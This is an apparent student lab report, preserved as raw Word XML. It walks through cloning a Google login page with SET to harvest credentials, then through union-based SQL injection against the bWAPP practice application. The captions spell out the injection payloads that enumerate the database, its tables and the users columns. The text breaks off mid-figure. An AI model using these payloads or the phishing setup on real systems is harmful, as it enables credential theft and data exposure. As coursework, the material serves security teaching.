        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2457588A" wp14:editId="75F881C8">
            <wp:extent cx="6858000" cy="4466590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="385652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52279" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4466590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A94299" w14:textId="7CDD7134" w:rsidR="00905069" w:rsidRDefault="00E07720" w:rsidP="003E080B">
      <w:r>
        <w:t>Figure 2.6 – Use google.com as our templated web front for our attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16B8F8" w14:textId="77777777" w:rsidR="00E07720" w:rsidRDefault="00E07720" w:rsidP="003E080B"/>
    <w:p w14:paraId="75E0D973" w14:textId="6E857FB7" w:rsidR="00905069" w:rsidRDefault="00905069" w:rsidP="003E080B">
      <w:r w:rsidRPr="00905069">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12817396" wp14:editId="5CAE8A32">
            <wp:extent cx="6858000" cy="4547235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="227061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61205" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4547235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBDC66B" w14:textId="7A35AB2E" w:rsidR="00905069" w:rsidRDefault="00153D09" w:rsidP="003E080B">
      <w:r>
        <w:t xml:space="preserve">Figure 2.7 – Use the victims console to see that the google website loads identical to the actual google.com web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2DF38D" w14:textId="77777777" w:rsidR="00153D09" w:rsidRDefault="00153D09" w:rsidP="003E080B"/>
    <w:p w14:paraId="57842B4C" w14:textId="70DE549E" w:rsidR="00905069" w:rsidRDefault="00905069" w:rsidP="003E080B">
      <w:r w:rsidRPr="00905069">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6134E6" wp14:editId="58372D00">
            <wp:extent cx="3524742" cy="4639322"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11166707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70776" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3524742" cy="4639322"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B72AA" w14:textId="5BA49387" w:rsidR="00153D09" w:rsidRDefault="00153D09" w:rsidP="003E080B">
      <w:r>
        <w:t>Figure 2.8 – After the victim enters their information, all that data is sent in plaintext to our host where we can view the captured data with no encryption.  Our credential social engineering tool has been successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08076288" w14:textId="77777777" w:rsidR="008D26BE" w:rsidRDefault="008D26BE" w:rsidP="003E080B"/>
    <w:p w14:paraId="6C25B66B" w14:textId="77777777" w:rsidR="00905069" w:rsidRDefault="00905069" w:rsidP="003E080B"/>
    <w:p w14:paraId="4CA44FD4" w14:textId="77777777" w:rsidR="00905069" w:rsidRDefault="00905069" w:rsidP="003E080B"/>
    <w:p w14:paraId="070B28F1" w14:textId="77777777" w:rsidR="00954A37" w:rsidRDefault="00954A37" w:rsidP="003E080B"/>
    <w:p w14:paraId="56D25672" w14:textId="77777777" w:rsidR="00954A37" w:rsidRDefault="00954A37" w:rsidP="003E080B"/>
    <w:p w14:paraId="4176575F" w14:textId="77777777" w:rsidR="00B738DE" w:rsidRDefault="00B738DE" w:rsidP="003E080B"/>
    <w:p w14:paraId="243873F1" w14:textId="77777777" w:rsidR="00B738DE" w:rsidRPr="003E080B" w:rsidRDefault="00B738DE" w:rsidP="003E080B"/>
    <w:p w14:paraId="0E6A26F6" w14:textId="77777777" w:rsidR="006F1887" w:rsidRDefault="00341037" w:rsidP="006F1887">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF8F37" w14:textId="56FBF5A0" w:rsidR="00041D04" w:rsidRDefault="00D85544" w:rsidP="00DB6DD0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc145876480"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidR="00041D04">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00041D04">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DB6DD0">
        <w:t xml:space="preserve">Technical Review – </w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38" w:rsidRPr="00AD5F38">
        <w:t>Credential Harvesting with SET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="27EF2989" w14:textId="2B89C0B7" w:rsidR="00057C7F" w:rsidRPr="00057C7F" w:rsidRDefault="00057C7F" w:rsidP="00057C7F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>In this attack, through the usage of SET attackers can create a resolution of a popular domain resolve to their own home address.  Once the host files are properly configured, attackers then use predesigned templates of popular sites such as google to have the victim tricked into thinking they are on the actual google site.  A more popular version of these types of social engineering is creating open Wi-Fi connections using a pineapple for example.  Like a SET attack, the attackers act as a man in the middle intercepting the packets being sent over an insecure http connection.  Once they get the information, attackers can either ignore the call or forward it to the actual site, allowing them to keep the victim confused and continue the attack as it looks like a legitimate call and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4FB47" w14:textId="041770AF" w:rsidR="00AD5F38" w:rsidRPr="00AD5F38" w:rsidRDefault="00AD5F38" w:rsidP="00AD5F38">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E8BEFD" w14:textId="77777777" w:rsidR="00AD5F38" w:rsidRDefault="00AD5F38" w:rsidP="00AD5F38">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF3D4D7" w14:textId="77777777" w:rsidR="00AD5F38" w:rsidRDefault="00AD5F38" w:rsidP="00AD5F38">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21390949" w14:textId="0047E1F5" w:rsidR="00AD5F38" w:rsidRDefault="00D85544" w:rsidP="00AD5F38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc145876481"/>
      <w:r>
        <w:t>3.0</w:t>
      </w:r>
      <w:r w:rsidR="00AD5F38">
        <w:t xml:space="preserve">       Introduction – </w:t>
      </w:r>
      <w:r w:rsidR="006D7673" w:rsidRPr="006D7673">
        <w:t>SQL Injection Chained Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5A63418D" w14:textId="69768AF4" w:rsidR="006638A1" w:rsidRPr="006638A1" w:rsidRDefault="00B8091E" w:rsidP="00B8091E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In this attack, an insecure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application is set up with a MySQL backend.  Through the lack of controls and restrictions on what queries can be completed on the search, attackers can inject SQL statements to query the table.  This bypass lets attackers send SQL commands directly to the database, exposing the ability to see data and other hidden information.  The lack of checks in place to eliminate illegal chars or query lengths is the primary entry point for a possible SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425EC72" w14:textId="77777777" w:rsidR="00AD5F38" w:rsidRDefault="00AD5F38" w:rsidP="00AD5F38">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DEC8A5C" w14:textId="02A09DF3" w:rsidR="00AD5F38" w:rsidRDefault="00AD5F38" w:rsidP="00AD5F38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_Toc145876482"/>
      <w:r w:rsidR="00D85544">
        <w:lastRenderedPageBreak/>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Lab Results – </w:t>
      </w:r>
      <w:r w:rsidR="006D7673" w:rsidRPr="006D7673">
        <w:t>SQL Injection Chained Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="570B02EB" w14:textId="77777777" w:rsidR="00E5761F" w:rsidRDefault="00E5761F" w:rsidP="00E5761F"/>
    <w:p w14:paraId="16EA28DE" w14:textId="6D784DB5" w:rsidR="00E5761F" w:rsidRDefault="00E5761F" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00E5761F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B49F8F6" wp14:editId="1FE0D7E6">
            <wp:extent cx="5353797" cy="4143953"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1863498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98641" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5353797" cy="4143953"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273CEC7" w14:textId="3B58799B" w:rsidR="00A66F09" w:rsidRDefault="00A66F09" w:rsidP="00E5761F">
      <w:r>
        <w:t xml:space="preserve">Figure 3.0 – Load up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web application to do our SQL testing against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC459CD" w14:textId="77777777" w:rsidR="00E5761F" w:rsidRDefault="00E5761F" w:rsidP="00E5761F"/>
    <w:p w14:paraId="143D62C6" w14:textId="70ECA7B4" w:rsidR="00E5761F" w:rsidRDefault="00E5761F" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00E5761F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41EA8CFE" wp14:editId="5E2FCCB4">
            <wp:extent cx="6096851" cy="4382112"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3124965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496579" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096851" cy="4382112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771E905" w14:textId="06193FC9" w:rsidR="00E5761F" w:rsidRDefault="00A66F09" w:rsidP="00E5761F">
      <w:r>
        <w:t>Figure 3.1- Load attack SQL injection through REST API – Post/Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F779FB8" w14:textId="2D74A290" w:rsidR="00E5761F" w:rsidRDefault="00E5761F" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00E5761F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E8D45AD" wp14:editId="0D9E8E41">
            <wp:extent cx="6858000" cy="3742055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9270184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18428" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3742055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75D653" w14:textId="3ADEA65B" w:rsidR="00E5761F" w:rsidRDefault="00A66F09" w:rsidP="00E5761F">
      <w:r>
        <w:t xml:space="preserve">Figure 3.2 – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a basic SQL injection query using # and seeing the 7 columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F57B0B" w14:textId="77777777" w:rsidR="00A66F09" w:rsidRDefault="00A66F09" w:rsidP="00E5761F"/>
    <w:p w14:paraId="4F702DC7" w14:textId="049E6C3E" w:rsidR="00E5761F" w:rsidRDefault="00E5761F" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00E5761F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CAB3A26" wp14:editId="69B6576F">
            <wp:extent cx="6858000" cy="2911475"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1555633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633161" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2911475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD8126C" w14:textId="5861CC12" w:rsidR="00E5761F" w:rsidRDefault="00A66F09" w:rsidP="00E5761F">
      <w:r>
        <w:t xml:space="preserve">Figure 3.3 – When changing from 7 to 8 columns, we see there is an order clause. This tells us there </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> only 7 columns in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3302AF71" w14:textId="77777777" w:rsidR="00A66F09" w:rsidRDefault="00A66F09" w:rsidP="00E5761F"/>
    <w:p w14:paraId="7CB05A38" w14:textId="41EE0C96" w:rsidR="00E5761F" w:rsidRDefault="00984AFB" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00984AFB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6465B6B3" wp14:editId="61D2F975">
            <wp:extent cx="6858000" cy="3611880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="16678600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860051" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3611880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E316E71" w14:textId="79134EDB" w:rsidR="00984AFB" w:rsidRDefault="00A66F09" w:rsidP="00A66F09">
      <w:r>
        <w:t>Figure 3.4 – Execute SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="00984AFB" w:rsidRPr="00984AFB">
        <w:t>' union select 1,2,3,4,5,6,7#</w:t>
      </w:r>
      <w:r>
        <w:t>], we can see the creating a union between the 7 columns returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0301EBDE" w14:textId="77777777" w:rsidR="00984AFB" w:rsidRDefault="00984AFB" w:rsidP="00E5761F"/>
    <w:p w14:paraId="67E8EB91" w14:textId="77777777" w:rsidR="00984AFB" w:rsidRDefault="00984AFB" w:rsidP="00E5761F"/>
    <w:p w14:paraId="7C71B94E" w14:textId="0B225FFF" w:rsidR="00984AFB" w:rsidRDefault="00984AFB" w:rsidP="00E5761F">
      <w:r w:rsidRPr="00984AFB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40C967A5" wp14:editId="74EA2C60">
            <wp:extent cx="6696075" cy="2582545"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
            <wp:docPr id="19897676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6764" name="Picture 1" descr="A computer screen shot of text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6696075" cy="2582545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51071AA3" w14:textId="5F17C033" w:rsidR="00984AFB" w:rsidRDefault="00A66F09" w:rsidP="00E5761F">
      <w:r>
        <w:t>Figure 3.5 – Execute SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="00984AFB" w:rsidRPr="00984AFB">
        <w:t xml:space="preserve">' and 1=2 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00984AFB" w:rsidRPr="00984AFB">
        <w:t>1,database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00984AFB" w:rsidRPr="00984AFB">
        <w:t>(),3,4,5,6,7#</w:t>
      </w:r>
      <w:r>
        <w:t>], this creates a return of databases that are false based on union selection and 1=2 (false).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98B802" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="57CD7D3A" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="0E301709" w14:textId="6764A40D" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F">
      <w:r w:rsidRPr="009A350D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF682A8" wp14:editId="6631DD27">
            <wp:extent cx="6858000" cy="3536950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="153670078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00788" name="Picture 1" descr="A computer screen shot of a black screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3536950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189D5EA" w14:textId="533FFA33" w:rsidR="009A350D" w:rsidRDefault="00A66F09" w:rsidP="00E5761F">
      <w:r>
        <w:t>Figure 3.6 – Execute SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">' and 1=2 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">_schema,table_name,4,5,6,7 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>'#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">], this returns the table names for the table schema </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D16FB9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908FC96" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="13A36D00" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="3B1CC7B2" w14:textId="323FDE1B" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F">
      <w:r w:rsidRPr="009A350D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573884AE" wp14:editId="1047D6C3">
            <wp:extent cx="6448425" cy="4275455"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1266280379"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80379" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6448425" cy="4275455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75313292" w14:textId="65A49BB9" w:rsidR="009A350D" w:rsidRDefault="00D16FB9" w:rsidP="00E5761F">
      <w:r>
        <w:t>Figure 3.7 – Execute SQL injection [</w:t>
      </w:r>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">' and 1=2 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">_name, column_name,4,5,6,7 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve">' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A350D" w:rsidRPr="009A350D">
        <w:t xml:space="preserve"> = 'users'#</w:t>
      </w:r>
      <w:r>
        <w:t>] to return the column headers for the table users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC91DA" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="58FB1194" w14:textId="77777777" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F"/>
    <w:p w14:paraId="12B4630D" w14:textId="7E303424" w:rsidR="009A350D" w:rsidRDefault="009A350D" w:rsidP="00E5761F">
      <w:r w:rsidRPr="009A350D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4D4A08" wp14:editId="047DD473">
